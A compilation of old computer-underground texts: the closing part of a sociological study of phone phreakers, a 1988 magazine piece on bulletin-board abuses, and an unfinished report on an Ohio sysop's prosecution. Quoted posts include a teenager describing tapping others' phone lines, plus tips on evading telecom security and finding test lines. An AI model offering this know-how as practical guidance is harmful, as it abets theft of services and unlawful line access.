               COSTLY FOR YOU  YOU AND EVERYBODY ELSE  TO GET CREDIT,
               AND DO BUSINESS WITH CREDIT CARDS.   YOU'RE GOING TO DO
               WHATEVER YOU DO ANYWAY.....DON'T  LOOK FOR ANY APPROVAL
               IN THIS DIRECTION.
                                       - 28 -
 
 
               Ironically,  experienced phreaks are  not only offended by
          such disregard of law,  but also feel that "rip-off artists" have
          no information to share and only increase the risk for the "tech-
          no-junkies."  Message boards reflect hostility toward apprehended
          "lamerz" with such  comments as "I hope they burn  him," or "the
          lamer probably narked  {turned informant} to the  pheds {law en-
          forcement agents}."  Experienced phreaks  also post continual re-
          minders that some actions, because of their illegality,  are sim-
          ply unacceptable:
               It should be pointed out  however,  that should any of
               you crack any WATS EXTENDER access codes and attempt to
               use them,  you are guilty  of Theft of communications
               services from the company who owns it, and Bell is very
               willing and able to help nail you!  WATS EXTENDERS can
               get you  in every bit as  much trouble as a  Blue Box
               should you be caught.
               Ex-phreaks,  especially those who are  no longer defined by
          law as juveniles,  often attempt to caution younger phreaks from
          pursuing phreaking:
               ZA1: One thing to consider, also, is that the phone co.
               knows where the  junction box is for all  of the lines
               that you are messing with and  if they get enough com-
               plaints about the bills, they may start to check things
               out (I hope your work is neat).  I would guess that the
               odds are probably against  this from happening though,
               because when  each of the  people call  to complain,
               they'll probably get a different  person from the oth-
               ers.   This means that someone at Ma Bell has to notice
               that all of  the complaints are coming  from the same
               area...I don't  think anybody there really  cares that
               much about their  job to really start  noticing things
               like that...anyway, enjoy!!!   My guess is that you're
               under-age.  Anyway, so if they catch you, they won't do
               anything to you anyway.
               ZB1:  Yeah I am a minor (17 years old) I just hope that
               they don't cause I would like to not have a criminal or
               juvenile record when I apply to college.  Also if they
               do come as I said in the  other message if there are no
               wires they can't prove shit. Also as I said I only hook
               up after 6 p.m.  The phone company doesn't service peo-
                                       - 29 -
 
 
               ple after 6 p.m.   Just recently (today) I hooked up to
               an empty line.    No wires were leading  from the two
               plugs to somebody  house but I got a  dial tone.  How
               great. Don't have to worry about billing somebody else.
               But I still  have to disconnect cause  the phone bills
               should be  coming to the  other people  pretty soon.
               HEHEHEHE
               ZX1: Be cool on that, especially if you're calling oth-
               er boards.   Easiest way for telecom security to catch
               you is match the number called to the time called, call
               the board,  look at users log or messages for hints of
               identity, then work from there.  If you do it too much
               to a pirate board,  they  can (and have successfully)
               pressured the sysop to reveal the identity under threat
               of prosecution.  They may or may not be able to always
               trace it back,  but remember:  Yesterday's phreaks are
               today's telecom security folk.   AND: IT'S NOT COOL TO
               PHREAK TO  A PIRATE  BOARD...draws attention  to that
               board and screws it up  for everybody.  So,  be cool
               phreaking....there's safer ways.
               ZC2:  Be cool, Wormburger.  They can use all sorts of
               stuff for evidence.  Here's what they'd do in Ill.  If
               they suspected you, they'd flag the phone lines,  send
               somebody out during the time you're on (or they suspect
               you're on) and nail you.  Don't want to squelch a bud-
               ding phreak,  but you're  really taking an unnecessary
               chance.   Most of  us have been doing  stuff for some
               time,  and just don't want to  see you get nailed for
               something. There's some good boards with tips on how to
               phreak, and if you want the numbers, let me know. We've
               survived to warn you because  we know the dangers.  If
               you don't know what ESS is, best do some quick research
               (P/h message log, 1988).
               In sum,  the attraction of phreaking and its attendant life-
          style appear to center on three fundamental characteristics:  The
          quest for knowledge,  the belief in a higher ideological purpose
          of opposition to potentially dangerous technological control, and
          the enjoyment of risk-taking.   In a sense, CU participants con-
          sciously create dissonance as a  means of creating social meaning
          in what is perceived as  an increasingly meaningless world (Milo-
          vanovic and Thomas, 1989).   Together,  phreaks and hackers have
 
                                       - 30 -
 
 
          created an overlapping culture that,  whatever the legality,  is
          seen by participants as a legitimate enterprise in the new "tech-
          no-society."
                                     Conclusion
               The transition to an  information-oriented society dependent
          on computer technology brings with  it new symbolic metaphors and
          behaviors.  Baudrillard (1987:  15)  observed that our private
          sphere now ceases to be the stage  where the drama of subjects at
          odds with their objects and with their image is played out,  and
          we no longer exist as playwrites or actors,  but as terminals of
          multiple networks.   The public space of the social arena is re-
          duced to the private space of  the computer desk,  which in turn
          creates a new semi-public, but restricted,  public realm to which
          dissonance seekers retreat.   To participate in the computer un-
          derground is to engage in what Baudrillard (1987:  15) describes
          as private telematics, in which individuals,  to extend Baudril-
          lard's fantasy metaphor,  are transported from their mundane com-
          puter system to the controls of a hypothetical machine,  isolated
          in a position of perfect  sovereignty,  at an infinite distance
          from the original universe.   There, identity is created through
          symbolic strategies and collective  beliefs (Bordieu,  cited in
          Wacquant, 1989: 35).
               We have argued  that the symbolic identity  of the computer
          underground creates a rich and  diverse culture comprised of jus-
          tifications, highly specialized skills,  information-sharing net-
          works, norms, status hierarchies, language, and unifying symbolic
 
                                       - 31 -
 
 
          meanings.   The stylistic elements of  CU identity and activity
          serve what Denzin (1988:  471) sees as the primary characteristic
          of postmodern behavior,  which is to  make fun of the past while
          keeping it alive and the search for  new ways to present the un-
          presentable in order  to break down the barriers  that keep the
          profane out of the everyday.
               The risks entailed by acting on  the fringes of legality and
          substituting definitions of acceptable  behavior with their own,
          the playful parodying of mass culture,  and the challenge to au-
          thority constitute an exploration of the limits of techno-culture
          while resisting the  legal meanings that would  control such ac-
          tions.   The celebration of anti-heros, re-enacted through forays
          into the world of computer  programs and software,  reflects the
          stylistic promiscuity,  eclecticism and code-mixing that typifies
          the postmodern experience (Featherstone, 1988: 202).  Rather than
          attempt to fit within modern culture and adapt to values and def-
          initions imposed on them,  CU  participants mediate it by mixing
          art, science, and resistance to create a culture with an alterna-
          tive meaning both to the dominant one and to those that observers
          would impose on them and on their enterprise.
               Pfuhl (1987) cogently argued that criminalization of comput-
          er abuse tends to polarize definitions of behavior.   As a conse-
          quence, To view the CU as simply another form of deviance,  or as
          little more than  "high-tech street gangs" obscures  the ironic,
          mythic, and subversive element,  the Nieztschean "will to power,"
          reflected in the attempt to  master technology while challenging
 
                                       - 32 -
 
 
          those forces that control it.   The "new society" spawned by com-
          puter technology is in its infancy, and, as Sennet (1970:  xvii)
          observed, the passage of societies through adolescence to maturi-
          ty requires acceptance of disorder and painful dislocation.
               Instead of embracing the dominant culture, the CU has creat-
          ed an irreducible cultural alternative, one that cannot be under-
          stood without locating its place  within the dialectic of social
          change.  Especially in counter-cultures, as Hebdige (1983: 3) ob-
          serves, "objects are made to mean and mean again," often ending:
             ..  .in the construction of a style, in a gesture of
               defiance or contempt, in a smile or a sneer.   It sig-
               nals a Refusal.  I would like to think that this Reusal
               is worth making,  that these  gestures have a meaning,
               that the smiles  and the sneers have  some subversive
               value. . .  (Hebdige, 1982: 3).
 
 
 
 
 
 
 
 
 
 
                                       - 33 -
 
 
                                      Footnotes
          [1] Participants in the computer underground engage in considera-
              ble word play that includes juxtaposition of letters. For ex-
              ample, commonly used words beginning with "f" are customarily
              spelled with a  "ph."  The CU spelling  conventions are re-
              tained throughout this paper.
          [2] Conly and McEwen (1990:  3) classify "software piracy" in the
              same category as theft of  computers and trade secrets,  and
              grossly confuse both the concept  and definition of computer
              crime by conflating any  illicit activity involving computers
              under a definition  so broad that embezzlement  and bulletin
              boards all fall within it.   However, the label of "computer
              criminal" should be reserved for those who manipulate comput-
              erized records in order to defraud or damage, a point implied
              by Bequai (1978: 4) and Parker (1983: 106).
          [3] One author has been active  in the computer underground since
              1984 and participated in Summercon-88 in St. Louis, a nation-
              al conference of elite hackers.   The other began researching
              p/hackers and pirates in 1988.   Both authors have had sysop
              experience with national CU boards.   As do virtually all CU
              participants, we used pseudonyms but, as we became more fully
              immersed in the culture,  our true identities were sometimes
              revealed.
          [4] Although we consider software pirates an integral part of the
              computer underground,  we have excluded them from this analy-
              sis both for parsimony and  because their actions are suffi-
              ciently different  to warrant separate analysis  (Thomas and
                                       - 34 -
 
 
              Meyer, 1990).   We also have excluded anarchist boards, which
              tend to be utilized by teenagers who use BBSs to exchange in-
              formation relating to social disruption, such as making home-
              made explosives, sabotaging equipment, and other less dramat-
              ic pranks. These boards are largely symbolic, and despite the
              name, are devoid of political intent.  However, our data sug-
              gest that many hackers began their careers because of the an-
              archist influence.
          [5] In January, 1990,  the co-editor of the magazine was indicted
              for allegedly  "transporting" stolen property  across state
              lines.   According to the Secret  Service agent in charge of
              the case in Atlanta  (personal communication),  the offender
              was apprehended for receiving copies  of E911 ("enhanced" 911
              emergency system)  documents by electronic mail,  but added
              that there was no evidence that those involved were motivated
              by, or received, material gain.
          [6] "Loop lines" are telephone company  test lines installed for
              two separate telephone numbers that connect only to each oth-
              er.  Each end has a separate phone number, and when each per-
              son calls one end, they are connected to each other automati-
              cally.  A loop consists of "Dual Tone Multi-Frequency," which
              is the touch tone sounds used  to dial phone numbers.  These
              test lines are discovered by  phreaks and hackers by program-
              ming their home computer to dial  numbers at random and "lis-
              ten" for the distinctive tone  that an answering loop makes,
              by asking sympathetic telephone company employees, or through
              information contained on internal company computers.
                                       - 35 -
 
 
 
                                    BIBLIOGRAPHY
          Allman, William F.  1990.  "Computer Hacking goes on Trial."
             U.S. News and World Report, January 22: 25.
          Altheide, David L.  1985.  Media Power.  Beverly Hills: SAGE.
          Baudrillard, Jean.  1987.  The Ecstasy of Communication.  New
             York: Semiotext(e).
          Bell, 1976.  The Cultural Contradictions of Capitalism.  New
             York: Basic Books.
          Bequai, August.  1987.  Technocrimes.  Lexington (Mass.):
             Lexington.
             1978.  Computer Crime.  Lexington (Mass.): Lexington.
          Bloombecker, Jay.  1988.  Interview, Hour Magazine.  NBC
             television, November 23.
          Bordieu, Pierre.  1989.  "Social Space and Symbolic Power."
             Sociological Theory, 7(Spring): 14-25.
          Brunner, John.  1989.  The Shockwave Rider.  New York:
             Ballantine.
          Callinicos, Alex.  1985.  "Posmodernism, Post-Structuralism,
             Post-Marxism?"  Theory, Culture and Society, 2(3): 85-101.
          Camper, John.  1989.  "Woman Indicted as Computer Hacker
             Mastermind."  Chicago Tribune, June 21: II-4.
          "Civil Liberties Hacked to Pieces: Jolyon Jenkins Refuses to
             Panic over Computer Crime."  New Statesman & Society, February
             9: 27.
          "Computer Expert's Son Cited as Virus Creator.' 1988.  Chicago
             Tribune, November 5: 1, 2.
          "Computer Hacker Ring with a Bay Area Link."  1990.  San
             Francisco Chronicle, May 9: A-30.
          "Computer Saboteur gets Probation."  1988.  Chicago Tribune, Oct.
             22: 4.
          Conly, Catherine H.  1989.  Organizing for Computer Crime
             Investigation and Prosecution.
                                       - 36 -
          Conly, Catherine H. and J. Thomas McEwen.  1990.  "Computer
             Crime."  NIJ Reports, 218(January/February): 2-7.
          Cooley, Ronald B.  1984.  "RICO: Modern Weaponry against Software
             Pirates."  Computer Law-Journal, 5(Fall): 143-162.
          Denzin, Norman K.  1988.  "Blue Velvet:  Postmodern
             Contradictions."  Theory, Culture and Society.  5(June):
             461-473.
          "Doctor Crash."  1986.  "The Techno-Revolution."  PHRACK, 1(6):
             Phile 3.
          "EB" {anonymous computerphile}.  1990.  PHRACK, 3(31): File 6.
          Featherstone, Mike.  1988.  "In Pursuit of the Postmodern: An
             Introduction."  Theory, Culture and Society, 2-3(June):
             195-215.
          Harper's Forum.  1990.  "Is Computer Hacking a Crime? A Debate
             from the Electronic Underground."  Harper's, 280(March):
             45-57.
          Frazer, James G.  1922.  The Golden Bough.  New York: MacMillan.
          Geertz, Clifford.  1973.  The Interpretion of Cultures.  New
             York: Basic Books.  1973.
          Gibson, William.  1984.  Neuromancer.  New York: Ace.
          Glaser, Barney G. and Anselm L. Strauss.  1967.  The Discovery of
             Grounded Theory:  Strategies for Qualitative Research.
             Chicago: Aldine.
          Goodenough, Ward.  1981.  Culture, Language, and Society.  Menlo
             Park (Calif.): Benjamin/Cummings.
          "Hacker, 18, Gets Prison for Fraud."  1989.  Chicago Tribune,
             February 15: III-1.
          Hebdige, Dick.  1982.  Subculture: The Meaning of Style.  New
             York: Metheun.
          Hollinger, Richard C. and Lonn Lanza-Kaduce.  1988.  "The Process
             of Criminalization: The Case of Computer Crime Laws."
             Criminology, 26(February): 101-126.
          Kane, Pamela.  1989.  V.I.R.U.S. Protection: Vital Information
             Resources under Siege.  New York: Bantam.
          Landreth, Bill.  1985.  Out of the Inner Circle: A Hacker's Guide
             to Computer Security.  Belleview (Wash.): Microsoft Press.
                                       - 37 -
          Lash, Scott.  1988.  "Discourse or Figure? Postmodernism as
             'Regime of Signification.'" Theory, Culture and Society,
             5(June):311-336.
          Latimer, Dan.  1984.  "Jameson on Post-Modernism."  New Left
             Review, 148(November/December): 116-128.
          Levy, Steven.  1984.  Hackers: Heroes of the Computer Revolution.
             Garden City: Doubleday.
          Lyotard, Jean-Francois.  1988.  The Postmodern Condition: A
             Report on Knowledge.  Minneapolis: University of Minnesota
             Press.
          Manning, Peter K.  (forthcoming).  "Strands in the Postmodernist
             Rope: Ethnographic Themes."  in N. Denzin (ed.), Studies in
             Symbolic Interaction (Vol. 13).  Greenwich (Conn.): JAI.
          Markoff, John.  1990a.  "3 Arrests Show Global Threat to
             Computers."  New York Times, April 4, A1, A11.
          -----.  1990b.  "Drive to Counter Computer Crime Aims at
             Invaders."  The New York Times, June 3: 1, 21.
          Marx, Gary T.  1988a.  Undercover: Police Surveillance in
             America.  Berkeley: University of California Press.
             1988b.  "The Maximum Security Society."  Deviance et
             Societe, 12(2): 147-166.
          Marx, Gary T., and Nancy Reichman.  1985.  "Routinizing the
             Discovery of Secrets: Computers as Informants."  Software Law
             Journal, 1(Fall): 95-121.
          McEwen, J. Thomas.  1989.  Dedicated Computer Crime Units.
             Washington D.C.: National Institute of Justice.
          Meyer, Gordon R.  1989a.  The Social Organization of the computer
             underground.  Unpublished Masters Thesis, Northern Illinois
             University.
          -----.  1989b.  "Hackers, Phreakers, and Pirates: The Semantics
             of the Computer Age."  Pp. 74-82 in P. Kane, V.I.R.U.S.
             Protection: Vital Information Resources under Siege.  New
             York: Bantam.
          Meyer, Gordon R. and Jim Thomas.  1989.  "Role Differentiation in
             the computer underground."  Paper presented at the Society for
             the Study of Social Problems annual meetings, Berkeley,
             August.
          Michalowski, Raymond J. and Erdwin H. Pfuhl.  1990 (forthcoming).
             "Technology, Property, and Law: The Case of Computer Crime."
             Contemporary Crisis.
                                       - 38 -
          Milovanovic, Dragan, and Jim Thomas.  1989.  "Overcoming the
             Absurd: Prisoner Litigation as Primitive Rebellion."  Social
             Problems 36(February): 48-60.
          Newman, Charles.  1985.  The Post-Modern Aura: The Act of Fiction
             in an age of Inflation.  Evanston (Ill.): Northwestern
             University Press.
          Parker, Donn B.  1983.  Fighting Computer Crime.  New York:
             Charles Scribner's Sons.
          Pfuhl, Erdwin H.  1987.  "Computer Abuse: Problems of
             Instrumental Control."  Deviant Behavior, 8(2): 113-130.
          Rosenbaum, Ron.  1971.  "Secrets of the Little Blue Box."
             Esquire, 76(October): 116-1125, 222-226.
          Rosenblatt, Kenneth.  1990.  "Deterring Computer Crime."
             Technology Review, 93(February/March): 34-40.
          Sandza, Richard.  1984a.  "The Night of the Hackers."  Newsweek,
             104(November 12): 17-18.
             1984b.  "Revenge of the Hackers."  Newsweek, 104(December
             10): 25.
          Schwartz, Eddie.  1988.  "Special on 'Computer Hacking.'" WGN
             Radio, Sept 27.
          Schwartz, John.  1990.  "The Hacker Dragnet: The Feds Put a Tail
             on Computer Crooks--and Sideswipe a few Innocent Bystanders."
             Newsweek, April 30: 50.
          Sennett, Richard.  1979.  The Uses of Disorder: Personal Identity
             and City Life.  New York: Vintage Books.
          Stoll, Clifford.  1989.  The Cuckoo's Egg: Tracking a Spy through
             the Maze of Computer Espionage.  New York: Doubleday.
          Thomas, Jim and James B. Marquart.  1988.  "Dirty Knowledge and
             Clean Conscience: The Dilemmas of Ethnographic Research."  Pp.
             81-96 in D. Maines and C. Couch (eds.), Information,
             Communication and Social Structure.  Springfield, Ill.:
             Charles C. Thomas.
          Thomas, Jim and Gordon R. Meyer.  (Forthcoming).  "(Witch)Hunting
             for the Computer Underground: Joe McCarthy in a Leisure Suit."
             The Criticial Criminologist.
          Tompkins, Joseph B., Jr., and Linda A. Mar.  1986.  "The 1984
             Federal Computer Crime Statute: A Partial Answer to a
             Pervasive Problem."  Computer-Law Journal, 6(Winter): 459-481.
                                       - 39 -
          Van, John.  1989.  "Oddballs no More, Hackers are now a Threat."
             Chicago Tribune, March 5, IV: 4.
          Van Maanen, John, and Stephen Barley.  1985.  "Cultural
             Organization: Fragments of a Theory."  Pp. 31-53 in P.J.
             Frost, et. al., (eds.), Organizational Culture. Beverly Hills:
             Sage.
          Wacquant, Loic J.D.  1989.  "Towards a Reflexive Sociology: A
             Workshop with Pierre Bordieu."  Sociological Theory,
             7(Spring): 26-63.
          Winter, Christine.  1988.  "Virus Infects Huge Computer Network."
             Chicago Tribune, November 4, 1, 18.
          "Yes, You Sound very Sexy, but I Really Need a Probation
             Officer."  1989.  Chicago Tribune, June 13, 10.
          WMAQ Evening News.  1990.  (Channel 5, Chicago), February 6.
          Zablit, Jocelyne.  1989.  "Fraud Sweep Nabs 2 Michigan Teens in
             Computer Ring."  Detroit Free Press, 25 May: 1, 18.
                                       - 40 -

BULLETIN BAWDY        (From an article in "The Games Machine" July 1988)
==============

The passion for Bulletin Boards is hotting up - and it's passion that's
running riot. But, as Mel Croucher uncovers, the lush undergrowth of
tangled passion flowers hides some nasty beasts.

If prostitution is "the oldest profession", then advertising such
forbidden fruit is the second oldest.  Since the Serpent pinned up a
notice reading "old devil wishes to meet naked women to swap knowledge in
exchange for apple" bulletin boards haven't changed much, although today
we are more likely to make use of a telephone plugged into an Apple.
 
Discreet little clay notices have been found in the petrified ruins of
ancient Pompeii which translate along the lines "strict nanny for
discipline", "French polishing given" and "private massage service
available from willing slaves".  Excavations on the island of Crete have
unearthed 3,000-year-old bulletin boards offering the services of
mercenary soldiers, houris advertised their favours in Persia by
displaying erotic statues in their doorways and in old Cathay there was a
highly organised system of intimate escort agencies catering for all tastes.
 
In 1962, the Bell Telephone Corporation of America were looking for ways
to entice subscribers to spend even more hours running up their phone
bills, and came up with the notion of something called The Private
Party-line.  Human nature being what it is, these dial-a-heavy-breather
services soon degenerated into a mass market for lonely hearts,
sex-starved singles and unsavoury perverts.  In 1973, the US
Telecommunications Authority tried, and failed, to control so-called
SPECIALIST services, where callers could dial up a whole range on
one-to-one conversations and talk dirty.
 
Here in the good old United Kingdom, we didn't catch on until the
Eighties, with services like the headline-hitting PARTY-LINE and
TALKABOUT.  f you dial up any of the more "specialist" services today, you
are more than likely to be conned into listening to a recorded message.
Corrine Russel (the VIXEN girl) tells me that when she takes part in the
"Dial a Page-Three Girl" phone lines, far from whispering erotic
naughtiness into the caller's earholes, all you get is a prerecorded
interview of her burbling on about her favourite things, "I'm on the cusp
of Scorpio and Sagittarius, and I love wearing black..." (yawn).
 
It is only when telephone are connected to computer modems that things
really start to get intriguing.  The computerised bulletin board is fast
becoming the favourite market place for advertising dubious taste.
 
When you rub your modem up against an exotic stranger, with nothing
between you except several hundred miles of cable and the phone bill,
sometimes, just sometimes gentle reader, wonderful things happen in your
search for true love, eternal happiness and the odd bit of sex.  Once upon
a time - and this is no fairy story - DEPUTY DAWG was all alone in his
sparse bedroom, trawling for companionship in the deep waters of Prestel's
Micronet 800, when he met the girl of his dreams, the one and only BUSY
LIZZIE.  Electronic romance blossomed, and before many nights had passed,
declarations of love were pasted all over the bulletin boards.  When they
met in the flesh, to coin a phrase, DEPUTY DAWG and BUSY LIZZIE made two
important decisions.  One:  they decided to get married.  Two:  they
promptly cancelled their Micronet subscriptions!  This is by no means an
isolated incident.  A few weeks ago JHARY THE WIZARD married THE VAMPIRE
ENCHANTRESS as a direct result of trying to murder one another on several
occasions.  They met through the cult roleplaying game SHADES (TGM001),
and if rumours are to be believed they can make the Earth move simply by
teleporting to another planet and blowing it up.
 
But for every tale of happiness that I have come across, there are a
hundred incidents of deceit, corruption, and criminal incitement.  It
gives me no pleasure to report that festering away deep down among the
bulletin boards there are some highly unpleasant pits:  ranging from Nazi
propaganda in West Germany, organised racism in the States, child
prostitution in France, and gay-bashing in Britain.
 
JOHN WALLBRIDGE is the founder of the Bulletin Board Association of Great
Britain, and he has recently been quoted as saying:  "They can be abused,
but I would hate to see them singled out for censorship.  They are largely
used by teenagers and they are prey to all sorts of harmful influences.
It's hard to say what people might get up to."
 
As a matter of fact, Mr. Wallbridge, it's not hard at all to say what
people might get up to.  It's dead easy.  And what is more, there is
precious little that anyone can do about it.  British Telecom are
responsible under Section 43 of the Telecommunications Act of 1984 to
inform the police when they discover "a person who sends a message or other
matter that is grossly offensive, indecent, obscene or menacing".  But
when a group of paedophiles (that's people who promote sex with children)
were busted for using a bulletin board of contact lists for illegal sex
with kids, the police were "unable to take action".  
 
There are three main reasons for not being able to control such uses of
bulletin boards.  One, users are often anonymous;  two, you can say
anything you like on a private line between consenting adults;  three,
nobody has got the time or money to monitor the damn things.
 
Recently, THE OBSERVER newspaper uncovered a particularly nasty mollusc
under a particularly nasty stone.  His name is DARREN INGRAM, and his
bulletin board service is named Corrupt Computing, operating out of his
mum's house in Brookside Avenue, Coventry.  A selfconfessed hater of gays,
18-yr-old Darren has already provided the following services for anyone
with a modem:  hoe to stop the emergency services from getting to the
scene of an accident, the Top Ten ways to kill a cop, how to firebomb
"jerks at school", how to shoplift, how to make nitroglycerine and how to
make riot shields "really f***ing burn."  Now young Darren will say that
all this information can be found in public libraries, but old Mel will
reply that libraries do not have two-way conversations that encourage
children to kill people and send money "to help corrupt".
 
Overseas, bulletin boards have slotted in to the traditional hobbies of
the natives.  Throughout the USA the White-Supremacist morons of the Ku
Klux Klan are recruiting kids via bullletin board networks to racial
hatred against blacks.  They are protected by cleverly shielded closed
user groups and Big Money.  In West Germany neo-Nazi groups are infesting
bulletin boards with propaganda against Jews, blacks and homosexuals.  In
France the state-run Mintel viewdata service has been successfully adopted
by prostitutes selling their wares, including both male and female persons
under the legal age of consent.
 
I spent a night checking out two British chatline options, the Telemap
network known at TELETALK, and the open-to-all-comers network advertised
as DESIRE.  I logged on for exactly the same amount of time, I had exactly
the same conversations using exactly the same vocabulary and then I
checked up on who was monitoring my private conversations.  Now I don't
give a monkey's about what both of these outfits print on their rate cards
of charges, and how they advertise their services, this is what happened
for real:
 
                        TELETALK                 DESIRE
Cost                    ave. 3:80 per hour       ave. 1:80 per hour
Password required       Yes                      No
Noticeboard facility    Yes                      Yes
Privacy                 Available if required    Not encouraged
"Serious" conversations About 40%                About 10%
Dirty words received    A few                    A great many
Dirty words sent        Thrown out of location   No response
Advice on pregnancy     Given a phone number     Given a phone number
Advice on drugs         Line disconnected        Given a phone number
Request for legal sex   Appointment made         No result
Request for illegal sex Line disconnected        Line disconnected
Request for firearms    Line disconnected        Misunderstood
Request for penpal      Thrown out of location   Yes

I suppose that various readers will conclude totally different attractions
or repulsions to that little analysis, depending on your proclivities, but
nobody can argue with the phone charges whereby one night of fruity
conversation could leave you bankrupt!
 
As for the monitoring aspect, TELETALK does indeed have some shady grey
ghosts overseeing what goes on, but as the amount of traffic increases,
monitoring becomes unworkable.  However, there are a number of real
safeguards in the system.  Firstly, paying subscribers are supposed to be
over 18, secondly conversations are selfmonitoring, and whoever is "in
charge" of a private location or conference or chat has the ability to
throw out any participant who gets abusive or obscene.
 
With DESIRE, things are different.  The whole marketing strategy concerns
the exploitation of young people's loneliness and some mythical quest
for immediate real friendships.  Indeed, there is a specific location
within DESIRE where callers are positively encouraged to transmit the
electronic equivalent of lavatory wall graffiti.  

But these commercial bulletin boards are pretty harmless stuff, it is the
private networks where most of the danger festers.  Fortunately, computing
has given birth to our very own guardians of justice as well as our very
own outlaws.  The hackers, in February of this year, a group of Dutch
hackers working for the GREEN network got so incensed by bulletin boards
offering weapons and weapons training that they blew its tiny silicon mind
by patching it into the local police HQ.
 
Multinationals have also had their noses tweaked.  Last Christmas, an IBM
employee got so frustrated with the garbage floating around the corporate
bulletin  boards that she seeded a neat little worm into the system.  The
worm appeared as a Christmas Card on her boss's monitor, and at the same
time sucked in his entire contact list.  It then replicated itself to that
list, sucking in all of their contacts, and spreading seasonal cheer
throughout the planet.  Unconfirmed rumours from within IBM suggest that
the system broke down totally in West Germany, and was reduced to a crawl
in the UK.  I sincerely hope that that's no fairy tale.  In the meantime,
to DEPUTY DAWG and BUSY LIZZIE, and to JHARY THE WIZARD and THE VAMPIRE
ENCHANTRESS, may you have every happiness, and may the blessing of the
bulletin board bring you never-ending multiple ...
 
LINE DISCONNECTED.  SWINE HASN'T PAID HIS PHONE BILL...


Akron BBS trial update: Dangerous precedents in sysop prosecution

You may already know about the BBS 'sting' six months ago in Munroe
Falls, OH for "disseminating matter harmful to juveniles." Those
charges were dropped for lack of evidence. Now a trial date of
1/4/93 has been set after new felony charges were filed, although
the pretrial hearing revealed no proof that *any* illegal content
ever went out over the BBS, nor was *any* found on it.

For those unfamiliar with the case, here's a brief summary to date.
In May 1992 someone told Munroe Falls police they *thought* minors
could have been getting access to adult materials over the AKRON
ANOMALY BBS. Police began a 2-month investigation. They found a
small number of adult files in the non-adult area.

The sysop says he made a clerical error, causing those files to be
overlooked. Normally adult files were moved to a limited-access
area with proof of age required (i.e. photostat of a drivers
license).

Police had no proof that any minor had actually accessed those
files so police logged onto the BBS using a fictitious account,
started a download, and borrowed a 15-year old boy just long enough
to press the return key. The boy had no knowledge of what was going
on.

Police then obtained a search warrant and seized Lehrer's BBS
system. Eleven days later police arrested and charged sysop Mark
Lehrer with "disseminating matter harmful to juveniles," a
misdemeanor usually used on bookstore owners who sell the wrong
book to a minor. However, since the case involved a computer,
police added a *felony* charge of "possession of criminal tools"
(i.e. "one computer system").

Note that "criminal tool" statutes were originally intended for
specialized tools such as burglar's tools or hacking paraphenalia
used by criminal 'specialists'. The word "tool" implies deliberate
use to commit a crime, whereas the evidence shows (at most) an
oversight. This raises the Constitutional issue of equal protection
under the law (14'th Amendment). Why should a computer hobbyist be
charged  with a felony when anyone else would be charged with a
misdemeanor?

At the pretrial hearing, the judge warned the prosecutor that
they'd need "a lot more evidence than this" to convict. However the
judge allowed the case to be referred to a Summit County grand
jury, though there was no proof the sysop had actually
"disseminated", or even intended to disseminate any adult material 
"recklessly, with knowledge of its character or content", as the
statute requires. Indeed, the sysop had a long history of
*removing* such content from the non-adult area whenever he became
aware of it. This came out at the hearing.

The prosecution then went on a fishing expedition. According to the
Cleveland Plain Dealer (7/21/92)

    "[Police chief] Stahl said computer experts with the Ohio
Bureau of Criminal Identification and Investigation are reviewing
the hundreds of computer files seized from Lehrer's home. Stahl 
said it's possible that some of the games and movies are being
accessed in violation of copyright laws."

Obviously the police believe they have carte blanche to search
unrelated personal files, simply by lumping all the floppies and
files in with the computer as a "criminal tool." That raises
Constitutional issues of whether the search and seizure was legal.
That's a precedent which, if not challenged, has far-reaching
implications for *every* computer owner.

Also, BBS access was *not* sold for money, as the Cleveland Plain
Dealer reports. The BBS wasn't a business, but rather a free
community service, running on Lehrer's own computer, although extra
time on the system could be had for a donation to help offset some
of the operating costs. 98% of data on the BBS consists of
shareware programs, utilities, E-mail, etc.

The police chief also stated:

    "I'm not saying it's obscene because I'm not getting into that
battle, but it's certainly not appropriate for kids, especially
without parental permission," Stahl said.

Note the police chief's admission that obscenity wasn't an issue at
the time the warrant was issued.


Here the case *radically* changes direction. The charges above were
dropped. However, while searching the 600 floppy disks seized along
with the BBS, police found five picture files they think *could* be
depictions of borderline underage women; although poor picture
quality makes it difficult to tell.

The sysop had *removed* these unsolicited files from the BBS hard
drive after a user uploaded them. However the sysop didn't think to
destroy the floppy disk backup, which was tossed into a cardboard
box with hundreds of others. This backup was made before he erased
the files off the hard drive.

The prosecution, lacking any other charges that would stick, is
using these several floppy disks to charge the sysop with two new
second-degree felonies, "Pandering Obscenity Involving A Minor",
and "Pandering Sexually Oriented Matter Involving A Minor" (i.e. 
kiddie porn, prison sentence of up to 25 years).

The prosecution produced no evidence the files were ever
"pandered". There's no solid expert testimony that the pictures
depict minors. All they've got is the opinion of a local
pediatrician.
All five pictures have such poor resolution that there's no way to
tell for sure to what extent makeup or retouching was used. A
digitized image doesn't have the fine shadings or dot density of a
photograph, which means there's very little detail on which to base
an expert opinion. The digitization process also modifies and
distorts the image during compression.

The prosecutor has offered to plea-bargain these charges down to
"possession" of child porn, a 4'th degree felony sex crime
punishable by one year in prison. The sysop refuses to plead guilty
to a sex crime. Mark Lehrer had discarded the images for which the
City of Munroe Falls adamantly demands a felony conviction. This
means the first "pandering" case involving a BBS is going to trial
in *one* month, Jan 4th.

The child porn statutes named in the charges contain a special
exemption for libraries, as does the original "dissemination to
juveniles" statute (ORC # 2907.321 & 2). The exemption presumably
includes public and privately owned libraries available to the
public, and their disk collections. This protects library owners
when an adult item is misplaced or loaned to a minor. (i.e. 8 year
olds can rent R-rated movies from a public library).

Yet although this sysop was running a file library larger than a
small public library, he did not receive equal protection under the
law, as guaranteed by the 14'th Amendment. Neither will any other
BBS, if this becomes precedent. The 'library  defense' was allowed
for large systems in Cubby versus CompuServe, based on a previous
obscenity case (Smith vs. California), in which the Supreme Court
ruled it generally unconstitutional to hold bookstore owners liable
for content, because that would place an undue burden on bookstores
to review every book they carry, thereby 'chilling' the
distribution of books and infringing the First Amendment.

If the sysop beats the bogus "pandering" charge, there's still
"possession", even though he was *totally unaware* of what was on
an old backup floppy, unsolicited in the first place, found unused
in a cardboard box. "Possession" does not require knowledge that
the person depicted is underage. The law presumes anyone in
possession of such files must be a pedophile. The framers of the
law never anticipated sysops,or that a sysop would routinely be
receiving over 10,000 files from over 1,000 users.

The case could set a far ranging statewide and nationwide precedent
whether or not the sysop is innocent or guilty, since he and his
family might lack the funds to fight this--after battling to get
this far.

These kinds of issues are normally resolved in the higher courts--
and *need* to be resolved, lest this becomes commonplace anytime
